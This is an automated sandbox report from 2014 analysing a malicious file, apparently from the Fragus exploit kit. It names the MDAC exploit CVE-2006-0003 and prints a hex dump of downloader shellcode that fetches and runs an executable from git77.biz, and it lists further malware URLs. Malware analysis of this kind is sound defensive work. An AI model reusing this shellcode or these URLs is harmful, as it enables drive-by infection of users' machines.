Analysis report for file 6223f79cf6f195fc5589e50f8544bbbc

Sample Overview

File:              fragus.txt
MD5:               6223f79cf6f195fc5589e50f8544bbbc
Analysis Started:  2014-10-26 18:12:11
Report Generated:  2014-10-26 18:12:27
Jsand version:     2.6.1472

Detection results

Detector          Result
Jsand 2.6.1472    malicious

In particular, the following URL was found to contain malicious content:

Exploits

Name    Description                                                             Reference
MDAC    Arbitrary file download via the Microsoft Data Access Components (MDAC)  CVE-2006-0003

Deobfuscation results

Evals

Writes

No writes.

Network Activity

Requests

URL
file://fragus.txt
file://6223f79cf6f195fc5589e50f8544bbbc/peg/show.php?get_ajax=1&r=0.2985799557254568
http://google.ru/

ActiveX controls

Shellcode

Hexadecimal                                        ASCII
33 c0 64 8b 40 30 78 0c  8b 40 0c 8b 70 1c ad 8b   3.d.@0x..@..p...
58 08 eb 09 8b 40 34 8d  40 7c 8b 58 3c 6a 44 5a   X....@4.@|.X<jDZ
d1 e2 2b e2 8b ec eb 4f  5a 52 83 ea 56 89 55 04   ..+....OZR..V.U.
56 57 8b 73 3c 8b 74 33  78 03 f3 56 8b 76 20 03   VW.s<.t3x..V.v..
f3 33 c9 49 50 41 ad 33  ff 36 0f be 14 03 38 f2   .3.IPA.3.6....8.
74 08 c1 cf 0d 03 fa 40  eb ef 58 3b f8 75 e5 5e   t......@..X;.u.^
8b 46 24 03 c3 66 8b 0c  48 8b 56 1c 03 d3 8b 04   .F$..f..H.V.....
8a 03 c3 5f 5e 50 c3 8d  7d 08 57 52 b8 33 ca 8a   ..._^P..}.WR.3..
5b e8 a2 ff ff ff 32 c0  8b f7 f2 ae 4f b8 65 2e   [.....2.....O.e.
65 78 ab 66 98 66 ab 33  c0 b8 61 64 00 00 50 68   ex.f.f.3..ad..Ph
54 68 72 65 35 24 1c 69  74 50 54 53 b8 aa fc 0d   Thre5$.itPTS....
7c ff 55 04 8b f8 83 c4  0c b0 6c 8a e0 98 50 68   |.U.......l...Ph
6f 6e 2e 64 68 75 72 6c  6d 54 b8 8e 4e 0e ec ff   on.dhurlmT..N...
55 04 93 50 33 c0 50 50  56 8b 55 04 83 c2 7f 83   U..P3.PPV.U.....
c2 4c 52 50 b8 36 1a 2f  70 ff 55 04 5b 57 56 b8   .LRP.6./p.U.[WV.
98 fe 8a 0e ff 55 04 6a  00 ff d7 68 74 74 70 3a   .....U.j...http:
2f 2f 67 69 74 37 37 2e  62 69 7a 2f 70 65 67 2f   //git77.biz/peg/
61 64 66 68 6b 70 7a 32  2e 65 78 65 00 00         adfhkpz2.exe..

This shellcode was found on file://6223f79cf6f195fc5589e50f8544bbbc/.

Malware

Additional (potential) malware:

URL                                  Type   Hash   Analysis
http://git77.biz/peg/adfhkpz2.exe    N/A
http://git77.biz/peg/file1.exe       N/A